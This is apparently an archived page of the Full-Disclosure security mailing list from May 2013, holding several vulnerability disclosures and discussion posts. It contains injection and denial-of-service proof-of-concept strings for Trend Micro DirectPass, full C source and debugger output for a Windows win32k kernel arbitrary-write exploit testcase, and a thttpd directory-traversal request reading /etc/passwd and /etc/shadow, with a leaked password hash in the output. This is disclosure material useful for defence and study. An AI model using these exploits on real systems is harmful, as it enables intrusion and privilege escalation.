InstallWorkspace.exe. The problem occurs in the libcef.dll (1.1.0.1044)of the trend micro direct-pass software core. Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass. Successful exploitation of the denial of service vulnerability can lead to a software core crash and also stable software module hangups. Vulnerable File(s): [+] InstallWorkspace.exe Vulnerable Library: [+] libcef.dll (Dynamic Link Library) Vulnerable Module(s): [+] Check Listing (Master Password) Vulnerable Parameter(s): [+] Master Password Proof of Concept: ================= 1.1 The code injection vulnerability can be exploited by local attackers with privileged system user account and medium or high user interaction. For demonstration or reproduce ... PoC: B%20&gt;"&gt;../;'[COMMAND|PATH INJECT!]&gt; Example Path: C:\Users\BKM\TrendMicro DirectPass Note: The bug allows attackers to request local restricted folders with the system software privileges to manipulate software files and the bound dynamic link libraries. 1.2 The persistent script code inject vulnerability can be exploited by local attackers with privileged system user account and medium or high user interaction. For demonstration or reproduce ... PoC: (Input) B%20&gt;"&lt;iframe src=a&gt;[PERSISTENT SCRIPT CODE!] Note: The master password is restricted to 20 chars per field on insert. The execution of persistent injected frames works also with external source. 1.3 The pointer (DoS) vulnerability can be exploited by local attackers with privileged system user account and low, medium or high user interaction. For demonstration or reproduce ... Path: C:\Downloadz\TrendMicro_DP_MUI_Download\Package\Share\UI Dynamic Link Library: libcef.dll PoC: (Input) %20%000000---%000%20 Note: The string crashs the master password check review module and the installworkspace.exe software process via null pointer (Dos) bug. The reproduce of the vulnerability can result in a permanent denial of service when the context is saved in the first instance and the save has been canceled. Critical Note: When i was checking the section i was thinking about how to use the injected code in the section to get access to the stored password. I was processing to load my debugger and attached it to the process when the request was sucessful and saved the address. After it i reproduced the same request with attached debugger and exploited the issue in the local cloud software mask. Then i was reviewing the changes and was able to use the injected frame test to see the location of the memory in the debugger. By processing to inject more and more context i was able to see were the location of the password in the memory has been stored when the software is processing to redisplay the saved temp password. Since today i have never seen this kind of method in any book or paper but i am sure i will soon write about the incident. Solution: ========= Both vulnerabilities can be patched by a secure parse or encode of the master password listing in the master password check module of the software. Filter and parse the master password and description security tip input fields. For the denial of service issue is no solution available yet but the fixes will prevent the manually exploitation of the issue. Note: The update is available from the update-server since the 12th may but trend micro says it was the 9th may. On the 18th we downloaded again the main software direct-pass and tested the core without an update and it was still vulnerable. To fix the issue in the software an update from the update-server is required after the install. Risk: ===== 1.1 The security risk of the local command/path injection software vulnerability in the directpass software core is estimated as high(-). 1.2 The security risk of the persistent scirpt code inject vulnerability is estimated as medium(+). 1.3 The security risk of the pointer (DoS) software vulnerability is estimated as medium(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm&lt; at &gt;vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin&lt; at &gt;vulnerability-lab.com - support&lt; at &gt;vulnerability-lab.com - research&lt; at &gt;vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team &amp; the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin&lt; at &gt;vulnerability-lab.com or support&lt; at &gt;vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory </pre> Vulnerability Lab 2013-05-20T23:29:19 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89367 <pre> I guess I'm talking to myself, maybe this list is all about XSS now ;) I'm quite proud of this list cycle trick, here's how to turn it into an arbitrary write. First, we create a watchdog thread that will patch the list atomically when we're ready. This is needed because we can't exploit the bug while HeavyAllocPool is failing, because of the early exit in pprFlattenRec: .text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong) .text:BFA122BD cmp eax, 1 ; Check for failure .text:BFA122C0 jz short continue .text:BFA122C2 xor eax, eax ; Exit early .text:BFA122C4 jmp early_exit So we create a list node like this: PathRecord-&gt;Next = PathRecord; PathRecord-&gt;Flags = 0; Then EPATHOBJ::bFlatten() spins forever doing nothing: BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this) { /* ... */ for ( ppr = ppath-&gt;pprfirst; ppr; ppr = ppr-&gt;pprnext ) { if ( ppr-&gt;flags &amp; PD_BEZIER ) { ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); } } /* ... */ } While it's spinning, we clean up in another thread, then patch the thread (we can do this, because it's now in userspace) to trigger the exploit. The first block of pprFlattenRec does something like this: if ( pprNew-&gt;pprPrev ) pprNew-&gt;pprPrev-&gt;pprnext = pprNew; Let's make that write to 0xCCCCCCCC. DWORD WINAPI WatchdogThread(LPVOID Parameter) { // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex&lt; at &gt;%p", GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &amp;PathRecord-&gt;next, &amp;ExploitRecord); InterlockedExchangePointer(&amp;PathRecord-&gt;next, &amp;ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0; } PathRecord-&gt;next = PathRecord; PathRecord-&gt;prev = (PVOID)(0x42424242); PathRecord-&gt;flags = 0; ExploitRecord.next = NULL; ExploitRecord.prev = 0xCCCCCCCC; ExploitRecord.flags = PD_BEZIERS; Here's the output on Windows 8: kd&gt; g ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 50, {cccccccc, 1, 8f18972e, 2} *** WARNING: Unable to verify checksum for ComplexPath.exe *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 ) Followup: MachineOwner --------- nt!RtlpBreakWithStatusInstruction: 810f46f4 cc int 3 kd&gt; kv ChildEBP RetAddr Args to Child a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0]) a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo]) a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4]) a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6 a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19 a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868 a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4]) a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame &lt; at &gt; a03aba2c) a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo]) a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0]) a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4]) a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame &lt; at &gt; a03abc14) 0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0]) 0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0]) WARNING: Stack unwind information not available. Following frames may be wrong. 0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f 0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade 0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo]) 0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH]) 0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo]) kd&gt; .trap a03aba2c ErrCode = 00000002 eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8 eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0 nv up ei ng nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 win32k!EPATHOBJ::pprFlattenRec+0x82: 8f18972e 8918 mov dword ptr [eax],ebx ds:0023:cccccccc=???????? kd&gt; vertarget Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 9200.16581.x86fre.win8_gdr.130410-1505 Machine Name: Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48 Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00) System Uptime: 0 days 0:02:30.432 kd&gt; .bugcheck Bugcheck code 00000050 Arguments cccccccc 00000001 8f18972e 00000002 Demo code attached. I have a working exploit that grants SYSTEM on all currently supported versions of Windows. Code is available on request to students from reputable schools. If nobody else on the list can figure out the final details, then I've lost faith in the next generation ;) Tavis. #ifndef WIN32_NO_STATUS # define WIN32_NO_STATUS #endif #include &lt;windows.h&gt; #include &lt;assert.h&gt; #include &lt;stdio.h&gt; #include &lt;stddef.h&gt; #include &lt;winnt.h&gt; #ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS #endif #include &lt;ntstatus.h&gt; #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 // // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase. // // Tavis Ormandy &lt;taviso&lt; at &gt;cmpxchg8b.com&gt;, March 2013 // POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN Regions[MAX_REGIONS]; ULONG NumRegion; HANDLE Mutex; // Log levels. typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; BOOL LogMessage(LEVEL Level, PCHAR Format, ...); // Copied from winddi.h from the DDK #define PD_BEGINSUBPATH 0x00000001 #define PD_ENDSUBPATH 0x00000002 #define PD_RESETSTYLE 0x00000004 #define PD_CLOSEFIGURE 0x00000008 #define PD_BEZIERS 0x00000010 typedef struct _POINTFIX { ULONG x; ULONG y; } POINTFIX, *PPOINTFIX; // Approximated from reverse engineering. typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[0]; } PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord; DWORD WINAPI WatchdogThread(LPVOID Parameter) { // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex&lt; at &gt;%p", GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &amp;PathRecord-&gt;next, &amp;ExploitRecord); InterlockedExchangePointer(&amp;PathRecord-&gt;next, &amp;ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0; } int main(int argc, char **argv) { HANDLE Thread; HDC Device; ULONG Size; HRGN Buffer; ULONG PointNum; ULONG Count; // Create our PATHRECORD in userspace we will get added to the EPATHOBJ // pathrecord chain. PathRecord = VirtualAlloc(NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); LogMessage(L_INFO, "Alllocated userspace PATHRECORD&lt; at &gt;%p", PathRecord); // Initialise with recognisable debugging values. FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC); PathRecord-&gt;next = PathRecord; PathRecord-&gt;prev = (PVOID)(0x42424242); // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite // loop in EPATHOBJ::bFlatten(). PathRecord-&gt;flags = 0; LogMessage(L_INFO, " -&gt;next &lt; at &gt; %p", PathRecord-&gt;next); LogMessage(L_INFO, " -&gt;prev &lt; at &gt; %p", PathRecord-&gt;prev); LogMessage(L_INFO, " -&gt;flags &lt; at &gt; %u", PathRecord-&gt;flags); ExploitRecord.next = NULL; ExploitRecord.prev = 0xCCCCCCCC; ExploitRecord.flags = PD_BEZIERS; LogMessage(L_INFO, "Creating complex bezier path with %#x", (ULONG)(PathRecord) &gt;&gt; 4); // Generate a large number of Bezier Curves made up of pointers to our // PATHRECORD object. for (PointNum = 0; PointNum &lt; MAX_POLYPOINTS; PointNum++) { Points[PointNum].x = (ULONG)(PathRecord) &gt;&gt; 4; Points[PointNum].y = (ULONG)(PathRecord) &gt;&gt; 4; PointTypes[PointNum] = PT_BEZIERTO; } // Switch to a dedicated desktop so we don't spam the visible desktop with // our Lines (Not required, just stops the screen from redrawing slowly). SetThreadDesktop(CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL)); Mutex = CreateMutex(NULL, TRUE, NULL); // Get a handle to this Desktop. Device = GetDC(NULL); // Spawn a thread to cleanup Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL); // We need to cause a specific AllocObject() to fail to trigger the // exploitable condition. To do this, I create a large number of rounded // rectangular regions until they start failing. I don't think it matters // what you use to exhaust paged memory, there is probably a better way. // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // failure. Seriously, do some damn QA Microsoft, wtf. for (Size = 1 &lt;&lt; 26; Size; Size &gt;&gt;= 1) { while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) NumRegion++; } LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion); LogMessage(L_INFO, "Flattening curves..."); // Begin filling the free list with our points. for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); EndPath(Device); } LogMessage(L_INFO, "No luck, cleaning up"); // If we reach here, we didn't trigger the condition. Let the other thread know. ReleaseMutex(Mutex); ReleaseDC(NULL, Device); WaitForSingleObject(Thread, INFINITE); return 0; } // A quick logging routine for debug messages. BOOL LogMessage(LEVEL Level, PCHAR Format, ...) { CHAR Buffer[1024] = {0}; va_list Args; va_start(Args, Format); vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args); va_end(Args); switch (Level) { case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break; case L_INFO: fprintf(stdout, "[+] %s\n", Buffer); break; case L_WARN: fprintf(stderr, "[*] %s\n", Buffer); break; case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break; } fflush(stdout); fflush(stderr); return TRUE; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Tavis Ormandy 2013-05-20T21:35:54 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89366 <pre>Maybe when we cut over to IPv6 the ISPs will revert to the golden age of putting all their gear on publicly addressable space :) Conversely, an enjoyable network design is where you route public IPs from a private network to a private network, and the public IP has different services on the internet to the internally routed version, but clients need access to both. NATing heaven. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Patrick Webster 2013-05-20T16:19:03 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89365 <pre> We have just released a paper [1], in which we detail several 0-day issues affecting a number of different game engines, including: Unreal Engine, CryEngine 3 and idTech 4. During our presentation at the recent NoSuchCon conference in Paris, we discussed [2] additional details about game engine issues. Additionally we demonstrated [3] how an attacker can use master servers to perform mass-exploiting of game vulnerabilities, in order to target and potentially take down entire game networks. [1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf [2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf [3] http://vimeo.com/66027238 --- ReVuln http://revuln.com http://twitter.com/revuln http://revuln.com/revuln.asc _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> ReVuln 2013-05-20T11:46:11 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89364 <pre>Because private addresses have no global meaning, routing information about private networks shall not be propagated on inter-enterprise links, and packets with private source or destination addresses should not be forwarded across such links. Routers in networks not using private address space, especially those of Internet service providers, are expected to be configured to reject (filter out) routing information about private networks. If such a router receives such information the rejection shall not be treated as a routing protocol error. Am 18. Mai 2013 14:55:08 schrieb Justin Elze &lt;formulals1&lt; at &gt;gmail.com&gt;: _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> Alexander Georgiev 2013-05-20T10:00:53 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89363 <pre>Hi &lt; at &gt;ll, the "Microsoft Installer" creates for applications installed via an .MSI the following uninstall information in the Windows registry (see &lt;http://msdn.microsoft.com/library/aa372105.aspx&gt;): [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall] "UninstallString"="MsiExec.Exe /X{&lt;GUID&gt;}" "ModifyPath"="MsiExec.Exe /I{&lt;GUID&gt;}" Note the unqualified path to the executable "msiexec.exe". On Windows installations without the "SafeProcessSearchMode" hotfix (cf. &lt;http://support.microsoft.com/kb/905890&gt;) or with this safeguard turned off (cf. &lt;http://msdn.microsoft.com/library/dd266735.aspx&gt;, which refers to &lt;http://support.microsoft.com/kb/959426&gt; alias MS09-015), an executable "msiexec.exe" placed in the CWD or the users "base" directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to "%USERPROFILE%") can be run instead of the intended executable "%SystemRoot%\System32\MsiExec.Exe". The VERY simple fix (which eliminates this attack vector completely): always use fully-qualified paths to the well-known executables. JFTR: cf. &lt;http://seclists.org/fulldisclosure/2011/Sep/160&gt; Stefan Kanthak _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Stefan Kanthak 2013-05-19T15:40:57 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89362 <pre>Hi guys, You can find the software affected at http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz Thanks, Metropolis ########################################### # # Software Name : Thttpd 2.25b # # Version : 2.25b (29dec2003) # # Bug Type : Directory Traversal Vulnerability # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 19/05/2013 # # Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz # # ########################################### PoC : 127.0.0.1:80/../../../../../../../../etc/passwd 127.0.0.1:80/../../../../../../../../etc/shadow Example : metropolis&lt; at &gt;Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/dev/null xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/bin/false gdm:x:42:42::/var/gdm:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/bin/false ident:x:98:98:pident user:/:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash apache:x:48:48:Apache:/var/www:/bin/false squid:x:23:23::/var/spool/squid:/dev/null named:x:70:70:Named:/var/named:/bin/false pcap:x:77:77::/var/arpwatch:/bin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash junkbust:x:73:73::/etc/junkbuster:/bin/bash mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false pvm:x:24:24::/usr/share/pvm3:/bin/bash user:$1$DjTSjByw$IQj8EmL4l7b0tLWbUTOrX0:0:0:Linux User,,,:/home/user:/bin/sh _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/</pre> metropolis haxor 2013-05-19T20:12:04 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89361 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello list, In the aftermath of most of my full-disclosure posts I've observed quite interesting referrer URLs when someone tries to read information provided explaining the issue. In quite some cases, those requests can be attributed to national CERTs, software distributors' security teams, universities with IT-security research units, ... accessing that information. Information leaked via the referrer URLs indicates, that a noticeable number of security experts do not exercise strict separation of their internal working processes, e.g. accessing their internal wiki/mantis/communication/... systems, from the context used for accessing POC data. In rare cases even session IDs are encoded in the URL. A malicious attacker could use the disclosure of e.g. an unrelated zero day to compromise especially machines of CERT/DoD/.. or get at least hints, who is interested in his material, e.g. by requests like [Some-IP] - - [14/May/2013:17:44:38 +0000] "GET /Security/2012/LinuxKernelBinfmtScriptStackDataDisclosure/ HTTP/1.1" 200 7707 "http://rcf.mitre.org/~coley/cve-content/coffin-train-source-complex.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" hd PS: just curious: would be interested, what coffin-train-source-complex.html is about, perhaps one having access to the source could forward me a copy. - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlGZSDAACgkQxFmThv7tq+5J+ACdEFZ0zaucMaKsxCyfM7DbAAi2 1RgAn1SK6mcFxFdjAw3GOkzrikiQlCAd =/E2Z -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> halfdog 2013-05-19T21:46:30 http://permalink.gmane.org/gmane.comp.security.full-disclosure/89360 <pre>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Folks, We have published a revision of our IETF I-D "A method for Generating Stable Privacy-Enhanced Addresses with IPv6 Stateless Address Autoconfiguration (SLAAC)". This revision is available at: &lt;http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07&gt;. This proposal is key for the mitigation of address-scanning attacks, while at the same time preventing host-tracking. Stay tuned for more IPv6 security news on our Twitter account: &lt; at &gt;SI6Networks Thanks! Best regards, Fernando Gont - -------- Original Message -------- Subject: I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt Date: Sun, 19 May 2013 10:06:30 -0700 From: internet-drafts&lt; at &gt;ietf.org To: i-d-announce&lt; at &gt;ietf.org CC: ipv6&lt; at &gt;ietf.org A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the IPv6 Maintenance Working Group of the IETF. Title : A method for Generating Stable Privacy-Enhanced Addresses with IPv6 Stateless Address Autoconfiguration (SLAAC) Author(s) : Fernando Gont Filename : draft-ietf-6man-stable-privacy-addresses-07.txt Pages : 26 Date : 2013-05-19 Abstract: This document specifies a method for generating IPv6 Interface Identifiers to be used with IPv6 Stateless Address Autoconfiguration (SLAAC), such that addresses configured using this method are stable within each subnet, but the Interface Identifier changes when hosts move from one network to another. This method is meant to be an alternative to generating Interface Identifiers based on IEEE identifiers, such that the benefits of stable addresses can be achieved without sacrificing the privacy of users. The IETF datatracker status page for this draft is: https://datatracker.ietf.org/doc/draft-ietf-6man-stable-privacy-addresses There's also a htmlized version available at: http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07 A diff from the previous version is available at: http://www.ietf.org/rfcdiff?url2=draft-ietf-6man-stable-privacy-addresses-07 Internet-Drafts are also available by anonymous FTP at: ftp://ftp.ietf.org/internet-drafts/ - -------------------------------------------------------------------- IETF IPv6 working group mailing list ipv6&lt; at &gt;ietf.org Administrative Requests: https://www.ietf.org/mailman/listinfo/ipv6 - -------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBAgAGBQJRmRRDAAoJEK4lDVUdTnSS3pcP/jmuTIj7JPFk0IKHIokTCuvq BNTl1/FD/kXR7r37qj8zmCWIs7sAyJAbb5xzrOcr6XddsHuyp89RpNMWjaT0Iezv uHFFcY8pq21TsbZDpCJdmbuDp6LrT0BUXnyLQDBKRlJwccqDgQDsyW5YYnPl7LjH Tebm3DgZWNSR8iz0Rfg0oTdnWp836UFqWBTgrcInX7hJtZAXDmUm3NTiyfqP+9iE X5B0HG2p0H8FZudf/lW2Rxo4oQBhC/A51PJZRfzzSxQf9AlPJA6KYit6KPfkrztf PZT/VqBQYLL41MzzEmYbrlbG4MKncyu5SFQTUDVg35vqYhcGNjfiOKZ/fn9ADAsp 37z5FcmO11XOrkzqYe89o8uRzGqaD25ZNuRRKNzYwKMS433zgcCTsU2ohSaXvf8G f3blOLEJ213cm5NrcoiAQ00ghFVo1vqbWexzFI8EZJVok+vyT874MhF/At47DO1u sG08/KHmYPBZuGsQ6O+02n3MSsCh3MCGHBQaNWp/5VB7DJPu4uDHIqc0yvwyJs49 kP9hwi2Zrq002OlAbOcccSV+zfJQc0wTmrA/qijamCgtOumJmH2xwmoL3HIujgFx runuXPpRveNRi7Q8q2nW1PUNb+ZW+nOylDFsTPABJv0oDGqKkZe8/FxxQvkKO79U NXngWIkchz4keiq65o/j =iw6A -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ </pre> Fernando Gont 2013-05-19T18:05:00 Search the mailing list at Gmane query http://search.gmane.org/?group=$group=gmane.comp.security.full-disclosure